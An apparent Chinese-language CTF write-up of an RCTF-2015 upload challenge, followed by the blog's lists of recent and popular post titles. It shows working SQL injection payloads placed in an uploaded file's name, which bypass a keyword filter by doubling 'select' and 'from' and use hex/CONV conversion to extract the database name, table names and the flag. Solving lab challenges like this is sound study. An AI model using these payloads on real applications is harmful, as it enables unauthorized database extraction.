这道题的话,看了一下是RCTF-2015的原题。。。。可是这也太难了吧QAQ,文件名作为注入点可也是太秀了,害的我一直以为是文件上传QAQ,并且这道题的坑还不少,就是注入时的输出只能为10进制。。。。。这也就是说还需要你进行一下进制转换。。。

还有这里面将select和from过滤了一次。。。你还需要双写,,,哎。心累

一遍遍的fuzz的话,不知道要弄到什么时候。幸亏我是看着题解做的2333:)

不说了,因为自己啥也不会(看的题解QAQ),所以直接将payload发一下(其实不难,主要是你能够发现问题)

爆数据库名:     '+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg 

将filename里面的内容替换掉,然后发送,刷新一下页面,就会有回显了。

                                                      

先把10进制变为16进制在转为字符串,还有因为回显位数有限,所以你还需要多切割几次QAQ

爆表名:'+(selselectect  CONV(substr(hex(selselectect table_name  frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),1,10),16,10))+'.jpg

爆列名:把上面的改一下就行了

爆flag:'+(selselectect+CONV(substr(hex((selselectect i_am_flag  frfromom hello_flag_is_here  )),25,12),16,10))+'.jpg

自己还是太菜了

最新文章

  1. entity framework自动迁移
  2. Python开发程序:FTP程序
  3. 初识zookeeper(一)之zookeeper的安装及配置
  4. Android Studio系列教程五--Gradle命令详解与导入第三方包
  5. CSAPP(2):程序的汇编表示(Linux版)
  6. [译]C++书籍终极推荐
  7. Android开发UI之布局文件LinearLayout
  8. 【翻译】A (very) short introduction to R R的简短介绍
  9. Linux下配置Apache最大连接数
  10. Dockerfile 最佳实践
  11. C#工作笔记
  12. 【Stack Overflow -- 原创加工、原创整理、生产实战】-- 深度复制
  13. 向日葵连CentOS
  14. iptables log日志记录功能扩展应用:iptables自动配置临时访问策略,任意公网登录服务器
  15. Python3学习笔记28-HtmlTestRunner
  16. vue build打包后css里的图片路径404不正确的问题
  17. 操作系统-移动操作系统-百科: iOS(苹果公司的移动操作系统)
  18. H5-DataUrl FileReader
  19. Python shell对比
  20. Android高效异步图片加载框架

热门文章

  1. html/css中相对定位relative和绝对定位absolute的用法
  2. 超实用!K8s 开发者必须知道的 6 个开源工具
  3. JavaScript里处理数字的一些常用方法
  4. git之坑2
  5. Nginx总结(六)nginx实现负载均衡
  6. Python函数编程——闭包和装饰器
  7. DevExpress的TextEdit、RadioGroup、ColorPickEdit设置默认值
  8. java使用FileSystem上传文件到hadoop分布式文件系统配置
  9. sql server 2014 的安装
  10. Netty源码分析 (十)----- 拆包器之LineBasedFrameDecoder